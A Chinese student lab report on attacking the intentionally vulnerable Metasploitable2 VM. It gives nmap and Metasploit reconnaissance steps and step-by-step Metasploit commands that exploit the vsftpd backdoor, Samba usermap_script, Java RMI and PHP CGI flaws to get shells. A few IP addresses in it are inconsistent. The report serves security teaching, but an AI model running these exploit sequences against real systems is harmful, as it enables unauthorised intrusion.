1.实验内容
掌握使用Metasploit和nmap等工具进行前期渗透的方法,并利用四种特定的漏洞对靶机进行攻击。
(1)掌握Metasploit和nmap的用法
学习并熟悉Metasploit框架的基本操作,包括模块搜索(Search)、使用(Use)、展示选项(Show)、设置参数(Set)以及执行攻击(Exploit/run)的流程。
(2)学习前期渗透的方法
利用nmap等工具对目标主机进行主机发现,确定目标主机的IP地址和在线状态。
进行端口扫描,列出目标主机上开放的端口及其对应的服务。
扫系统版本,确定目标主机上运行的操作系统和服务软件的版本信息。
查找并确认目标主机上存在的已知漏洞,为后续的漏洞利用攻击做准备。
(3)利用四种漏洞对靶机进行攻击
- Vsftpd源码包后门漏洞:利用特定版本的vsftpd服务器程序中的后门代码,触发后门监听6200端口,并执行任意代码。
- SambaMS-RPC Shell命令注入漏洞:通过向Samba服务的MS-RPC接口提交恶意输入,利用未经过滤的用户输入执行任意命令,以nobody用户的权限获取对目标主机的控制权。
- Java RMI SERVER命令执行漏洞:利用Java RMI Server的RMI注册表和RMI激活服务中的安全漏洞,执行远程代码,获取对目标主机的控制权。
- PHP CGI参数执行注入漏洞:通过在请求参数中插入执行命令,利用CGI脚本未正确处理请求参数的漏洞,执行任意代码,获取对目标主机的控制权。
2.实验过程
2.1前期渗透
- 下载靶机Metasploitable2,并获取靶机ip地址。使用
ipconfig
得到地址为192.168.36.149。
2.在kali中打开msfconsole,输入以下命令发现主机。
search arp_sweep
use 0
set RHOSTS 192.128.36.0/24
run
找到了靶机!!!!
3.命令行输入nmap -p 1-2048 192.168.36.149
查看靶机开放的端口。
或者使用Aux中的portscan/tcp,输入以下命令:
search portscan/tcp
use 0
set RHOSTS 192.168.36.149
exploit
4.扫描系统版本、漏洞
search auxiliary/scanner/smb/smb_version
use 0
set RHOSTS 192.168.1.8
exploit
目标主机运行的是Unix操作系统,版本为Samba 3.0.20-Debian,并使用SMBv1协议,存在已知漏洞。
2.2Vsftpd源码包后门漏洞(21端口)
打开msfconsole后输入以下命令。
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS 192.168.36.149
run
再输入uname -a,pwd,id命令,可以看到已经获取靶机的shell,攻击成功。
2.3SambaMS-RPC Shell命令注入漏洞(端口139)
打开msfconsole后输入以下命令。
use exploit/multi/samba/usermap_script
set RHOST 192.168.36.149
exploit
再输入uname -a命令,可以看到已经获取靶机的shell,攻击成功。
2.4Java RMI SERVER命令执行漏洞(1099端口)
在前期渗透中已经得知1099端口开放
在msfconsole中输入以下命令:
use exploit/multi/misc/java_rmi_server
set RHOST 192.168.36.149
exploit
shell
输入命令whoami,得到结果root,说明攻击成功。
2.5PHP CGI参数执行注入漏洞(80端口)
在msfconsole中输入以下命令。
use exploit/multi/http/php_cgi_arg_injection
set RHOST 192.168.36.149
exploit
shell
输入pwd、uname -a、id、dir等指令检测是否攻击成功,可以执行命令,说明攻击成功。
3.问题及解决方案
- 问题1:发现主机的时候,一直没有找到,卡在之前的ip的网段的“.1”主机。
- 问题1解决方案:发现两台虚拟机不在同一网段,将虚拟机换成NET模式,重新启动虚拟机即可。
4.学习感悟、思考等
这次渗透测试实验比较简单,几乎没有遇到问题,我亲自操作Metasploit和Nmap这两款工具,亲历了从信息收集、端口扫描到漏洞探测的全过程。Metasploit的模块化与自动化特性,简化了攻击流程,在面对不同类型的漏洞时,迅速找到对应的攻击模块,用简单的语句就能进行攻击,让我体验到站在巨人肩膀上解决问题的便捷与强大。实验过程中对漏洞的成功利用,增强了我的实践能力,也揭示了网络安全的脆弱性与保护的紧迫性,意识到持续学习与适应新技术对于维护网络安全至关重要。